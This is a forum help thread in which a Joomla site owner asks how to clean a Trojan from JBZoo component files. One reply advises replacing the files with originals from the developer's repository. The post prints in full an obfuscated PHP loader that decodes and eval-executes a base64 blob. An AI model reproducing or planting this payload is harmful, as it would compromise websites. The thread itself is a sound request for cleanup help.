L
L
lacapitan2018-05-16 10:46:02
Joomla
lacapitan, 2018-05-16 10:46:02

How to cure a site from a Trojan (Norton identified it as Kryptik.BC)? Joomla 2.5?

Good afternoon.
Faced with a virus on the site. Removed all infected files and inserts. But AI-Bolit Scanner complains about 3 files. All 3 refer to the ZOO component (forms a product catalog).
Help me figure out how to take it off?
1.
Let topas34.ru/public_html/media/zoo/applications/jbuniversal/framework/jbzoo.php
Content:
Code

<?php function TEp($TOgpQG){$TOgpQG=gzinflate(base64_decode($TOgpQG));for($i=0;$i<strlen($TOgpQG);$i++){$TOgpQG[$i] = chr(ord($TOgpQG[$i])-1);}return $TOgpQG;}eval(TEp("pVoJc+LKEf4Bqcp/8KtQwZSP6EAC2cGv7F2Dl/K12Mu12bh0YbAl0OM2fvvb83XrNgg2iaskzdHT03f3DN7bo79c7fru4vz64Xv+SdRkTSip5VLpKf+jcj4e62/7hj6x1eKTZZsjy97P54/z3VrT1VtoKA718JxXKvnCYRak4nTPAbQJhhYDG956C9jWcATzwW7+VoQqCxJzEWlryAzMtvE0eqZbxXeWSRYmTTxy440/F7P1/Yx2oxeAhcg2MlgDEIlrE3dMEMlwZbaWvQ4a0nJuSt82sIc5hmbaZ+h1zyt4b4D0tbNpO1PGisZbW647Zm3Z72zciBiuVQW95sy6bnkDfpOkUtNW6yJhWTkrILBqzen6PCZMmdnNngeM7Kw2z2Nx5gzWZU9umcG6TJxZfHbk5ptR1aZYa7WWgt7U0PLwGG53TgYGAePdaX3NEB8m26QL0gM+pAp8vuHZtADDvkLQYM3jSx6TqRxasEk/GCcbIwrrb522Azdoov2KxyJ3vt3ggBgO7A4tuM1smw9a7foEYLDAF1onNfDegJNch1FlhQ29Jfa7JJLmi0FyulCMVvOtKzWH6GClsm5bRFaNpP62PodRnwc0emSkkcOinSFxqbkyJWduOJqX6WmE6gpPHY/TFbW3bvtiQhJubZIke19zQItkEsxbW7qdG6SMCzx9pos8v3C69/vZP3/3+t5ebzY0p4PRcA+BWdVKqiaV9nODwntOD2Jzvi141dZl83P+MA8k38gsSKUr64qI8jpyw+l+YvxsYrcOb39TAfzDa11/FABF1tv7SssuvrYF6+FRbH6leQyQaRCUhnlMoidYeBEIPgSl05a0l2i4jtRt11ed1oLQY4i4rPJeDf+ju/W+eUW5QO0O6318oVfZkOtjfwHmac6QYNohaizA2Lnaad/iu+q2GyueAyYZA7eORfO8C6NHR4b4YdJXN6qNr0v8zbGGbT9AgiEfDwHQpkSX2pE0tm+X1g/9bV7QNCSF4PSWGXCmUxcPs6NaV86i2w5IoFHBbpPMHXNRYUZCaBUNMKfqteaEFFFrvgUg6BBOGo8HwQ/Jwgen4TcRMCs8Vg2hBRICPHrpJRhQDbyw0GR7YJawHAvg8GGv2/7iCxl7EDSesmq0SFivXYoGy0DOFOZCiIZDrVjg6EQqg/SW0AlMLODarb8QdA1PlYg24VO+TNEJRdFFu00vxxiGmqUemRmIhRJDkfu2k9ARK4jA6kWDCGaz802Ivck3NN3V5pg0Wsv+NTHZnNBuLZFUHGzZZX3zQI1pgBheEdlpxFxRYJ8atLTR8zWi9UzG1DddMqcRmKIVbckb2NitDRmwrWGu/qJTkCMA9GKs6Ky8KYlH4jIiQkyyrRPBZsQ5QQE93rwDvoFJ+6GcvOACz5shX7B8CQAP2SY+5yolU8r3JNIaqwANtuC6QLjZViekGXRgcniT1ZEzIIzMCaS2dEyKvawMmkCb5zCBpjm8wZvNCd+WQiKzPo9UE3kLTf0qnG4RF9p9W2zgS0R/fV1WEcM+BRMYaQvOXeOyiVYHJOET+3AkYMkhApBmigBpvTLCi68YIvRAiHeEE+17HuheNHn3B4w8EP5GFatZYaQ4DJDupG7fYvG+6e2GAwCEyctOu9HvkEyreFZdWlwVEevwVXwifdG9YMCoVVfk22Tsx/k7t+HLnVYOEMOcazRAXIPdQui0oCap2bBazTci4UFZ6Feo7JjzeOsqNqUdAVFXGrBMUkoL7uEbl2/0L7w19sWmmO5btXhTUgNpBftWw03RpX3xebO/wS3IQgO3IFnOzFp/AUKYNfTrvrmiBbmAT4RXn8z2Jyb6Fb3rZzZ2WuUG8EHIYGC/jPfINKJIw2Hm5qEoYhEsa0o8kkl7c2N1GQ6iHyr/5hEd5MkAOlQdBrU5SlNS8c1jPC97c4wYfkgi/OjRFhIeb4CXTXpFiPDzAxGQmAJKzBLWeDogLghyMHbrM2DAUQ3FkUziDGoXckaosKajRvRVVzVqND/tthQBkxyNEZgRitVrqeuRUq8ajjnQWL9wWwY8zl8PL0aYM4OSn9GiH2CuV2lhhBlt4dFFIiMlsjrCNJDcCvtg2iQJaKxONIINr10FHfZ79xtZAXqhIbRoylcgV1uDONgTFosLSoQNtFnjbBvoXJ2TCIlOqTkhi6qJY46pZJSO1ZpKXTkMEl1yjVsyrticMAKLSm3B+Dtyv9it3Y51dwkQJC6LwpTecqSO7BsBqcsKLBXaqFIUpMSCz2V1QeqtLT0K16R2nHtaCG5QdvtiYTCHL3B+zHiGVFTxJdpJ577jPaBHFge0EU50Fwi3XkdibOgSQhwAo0VEBYFfYu4WbsplLaogiiVMYjhJ/Arsl+S/HF+ZGDaPR28VZpkuDtiVAIJJog3QJ2Ob4bEuHaARCIEpVTFAvDJethEij3wCrvroQYYkShY1vjUEzZAqdIlq4ELLR4cYPEFJltw/4A4gLGPUuGGyxRCXLfhGbKJdvRU7ruj55RzkjKEikQoYmg0VxjkBUUrEIIqFEFNAroFRCoifvRfGoKBasxaddr1v+JVZUveXXDYBVYiH9R/WfsNvtepbh/cJXJjUBfy+KJd9m/bSiI7QDEKNVhv9rh8YIssAVKCMmVVtKGaNzTLFG6FmWSEPos0BCV+KSX5kJ8PjlOw2XdgJeqSeh8AZA1MMacDMJYf6FiMKIxuWEhY8OJ1iKawRbY4P2IR3QJ/yPlsO7eODYTSCjNR2SWkLM1Mu1HwK0CU5utWVLjWFuyFMm7oJA2IhMqe0fIpZJ5AgI6tiQPLNkm0dXdCJNyWMbrsLbaETVol+xU5LNLxwWeFQQXgtkefxRhjFFUeUxrh+xFhQ5vvg6F/jwSKG5nVsDOh+I79F6EVzhNCLo9np2J7OxsO99EVXTv+eG/wonP6Mzm1ZN2rfhR/7iaOcUCiMxnvWwE4OijgA/paJQEwhkAqFv/898/7uu5QClguHib2LW7eRUyuV7dsUU8Bq4fDzl8blp8e7Rufp4fL+vHGOZuHUdPTJZK9+0R2N3r2Z4QzMvZzueZXhzHFOvfFgrk/tvdzT83g08yoAu7t7Or+/f6o17r7dnwYLJlN9inXRsXgwHEz3C+/BcO7FWI1Gp4Pe/m+DycSe7vsDBZyXeaYytBd7E9vp7UNXgSaDNT9DAiLUT0/maDiZjmcm7ZCb9geTozOi99zzTk6e7ekXzOpDEzei2BSmEYA8EU33+rQ/wS7JsU+jYW/w/GHwBleqzkfIa334PNOf7bXxgbE+ZNpEQ3qry7k9nDLoYLqYv85ehs7QHE8qEO3Q2hcOxLJyrEZ/pV39NPJzEi0hh5xDhLIkqcfKgf8p/DPTepUf0ZKiWjouH2S8C4chZklQisDsfwqFQiZq9cd+rgdTItEf5qA7CBtqXtdrQj+hWp90y6J1+3koGIYJI4PuT/J7x6ECoe8aGeZ+4TD/YgAqofBwccK5SilXK8PVIr5FtSQXjkL2yjLJjd+Fg3BQVItyrB+oZ3s/xiZKsnRcUg4yvoXC72ydgQZzTmBnvsjA1GHOGkw8fWr27fFh4IqFk0yRl2JtJvmIdacVEaAiJ9ggJy0lJxHxcBu0KKbBdyAX0wFPpIgX6nMDLaKSxq7uAE/rWCQlb8OeZlXawaqUZlXawaqUZlXawaqUZlXawaqUZlXawaqUZlUmVhf9gWPHPqCVNJi9yJ+E+aaGC8kInINVwq0tu6fPnOn1gKNeFTgPeeZWd+2t4pfT8pR3yFNOy1PeIU85LU95hzzltDxlkieCaWA98MOjsxfDHs6PzgaTh8EU0T1KQFGkSgQbOS3vIsn7ZxqZZRuz56MzVx+/JkuNItUaGSEyzEzvQSzl5FmPk1jGb4bfy6liAAEgDMZHZ5bhje3eYLl3nKC+KIOGyDLKgnIsISBu+MR2gjQjxtGyTPDxE4OJqoJUhxfiXmYM05A21q1qS9ATUcJFgRpuHEU7tVg8lg4y3uAxkwQxXdMViztFhnosGWs+UWWV0itqsKSIS7vgy2l4jeBdLk3IxyaVenXkWPb45KRH3ZSlkmMendE7SQEJPUmCQpaWmz0bw+Ufz5M/+gt3No7KkaIKQzztjca2bvb3kxvv6ZM9v090wAu4iCRvr2SLM131KrDAhCwUeHb2UpS98XaH9+ePV19uq3dP1S/Xl7fnN5ebxBiTlNqmWEDxwCJkyn/RIRXWrL30llPneTJ+7o89JxKTjFpBPch4Z/pxoph8T2X8SjJEJLTo1zcnVODMF8vZqzF/XbrD/uCPiBBREQQK3/zxQ1dWNBBxNkju82LM7fEE1RVC3GjkOjoKqqR2EDkrlcpe4GBx3OOgmK035cfRWVjNoDXSrZQxJux/ByJ1OyL4SUqGh3R4OcQhIc4+OzYobd8AoTx7g5EzHLkL0xv2nMU00kZRkQ7wwABwkrDfk9LOFlh5KxkqpZBfQ6RtR4S0m81PdKY6OsukVBK2b0D5JdT8PdUICY2kkmD2DuL2HRAw6hQJns4/33y5/fLwGJxnk/J5MTIyrEqVQ0aGvebj3PvLwPVG4+l+3neI4/7UdY49HTea9tQeH9uO7eI0F5832MDIxO3x0dnYfh5MAJY0dzVdjaiJamT32nRpoiZKPV6bzSjljAxGw+NoaJtUxPg5K1+/4Encs6Di4VPrSdA4xu/fxDSP/o9ZqPQhC5UoC1GllRWupHTuKKVzBw5uhd8qlZ4OP8s+iEqURCieHsa0J7JbzA8nt6j7a8lNSt+1lFArJMJnCZrP5g2H75ii/ye5lVRKbjHlSG7cSWUUHtkubBzZk8SnTa8E0/sFYeMMGqdZlJpUCgWngfgsW/HpQwUaHW8Dw9rsQSUugGLgozPcJwxt3AQl6C2j9tP5H+SSg+lzRhnnjNCGN29VpvI3JG+TN5f57GGM3Z5refPxfOaN56+eGWdjWUQuphfw7CIZ9rFOcrpYLCNZ/gImZMJ1TOmDiAbv286bFvhjWE9rRY2uLzZ9tlwqSThyhBgU0BW2RamoHMvRH25FtvZBbLbv0DGB0tUOfvhYyZa/WdsaaTtxb1YsCsIBvbawJycOHHIZh8WIwaKmkLIyqZZxsKAr1tQZeYeJaIgoa4rV0hlFQ0bZIQiuuLYJghPLNgANW0RqheqED6rc1o/PgHIpeVQsKWX4Cr9jEAVnzeguVC0d7OhvO0zKSB/h1WP2tZmMBBHaKHRPFr/pE+tZkwU6FG/67NCDCMva7cyigKi1pnRRSGc/UYDxsvVG1IsyRHeQ8S78O2RSljUcW6BQ/FaBq0XzdT+HHwYazcuGb5mJRDlJV3PbjJtOFn6a3Wbiw9F00HsLEh/iOM6YuFBhX05mTlFAmN1u06LAh7Md/iMKCKcbZJlObqIA+8d2iQo4s7ISBUiOgsZvafDNF0RBlTbzLPAJfkncwXUZrux/ZlRo4Z3++3+5DZItfgvA7yKWOxhuwR9R8J7rjybT7MO7jCIl/7d/LxaLfx3/DVVhHtfQvql8z/vfJzqI5/Fr24Zrm1QBkjjSJhK0SJfMqQsoEdfKJN7IqiWxVDqgV3zHJJVwb1A4Cw1aLCpiKhxt7xf+/HOPL94v/d9lArMl5R+u/2ZROPXPcVk1qky/dKAewe8bhxTdodWcNXL1wTBxLfpLkkC2+iAJmQo70tCH8SJLqE5l+MmJvcSRA5dAa5viuD62/5gNxvbTiH6U2gDhH1Ih7Y+41i5215Gtg5z+/C/tNeUWW+z1U/BbXXj5SYxniTS4L/E1kocA8//w23yCIcv6wKs/y9dCHwWWmNroq/HPUJA0/xIdxAT/Z9NNB7Dwl47A6MgruD4mV4+ML4s3XvThFsb3q6hUjXAkq4xNcSY69MVFelCv34Om6IabA9ja8XbzGsjor3/5Dw=="));

Site crashes when changes are made

Answer the question

In order to leave comments, you need to log in

2 answer(s)
A
alexalexes, 2018-05-16
@alexalexes

Files jbzoo.php, jbupdate.php, application.php have been obfuscated.
You need to save them locally and replace them with the original ones from the repository of the developer of the jbuniversal component. Or replace it from your repository, within which the site topas34.ru was developed, until the moment of infection.
If for some reason you could not find the original files, or you do not maintain a repository of developments, then it remains to perform an exciting task: deobfuscate the files. You can restore a sheet of code, but the names of the functions have already been lost, you have to guess what is responsible for what.

L
lacapitan, 2018-05-16
@lacapitan

2.
Let topas34.ru/public_html/media/zoo/applications/jbuniversal/framework/helpers/jbupdate.php
Content:
Changed: did not notice that it changed
3.
Path topas34.ru/public_html/media/zoo/applications/jbuniversal/application.php
Content: In files 2 and 3 the contents are identical
Changes: edits the layout in the product card

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question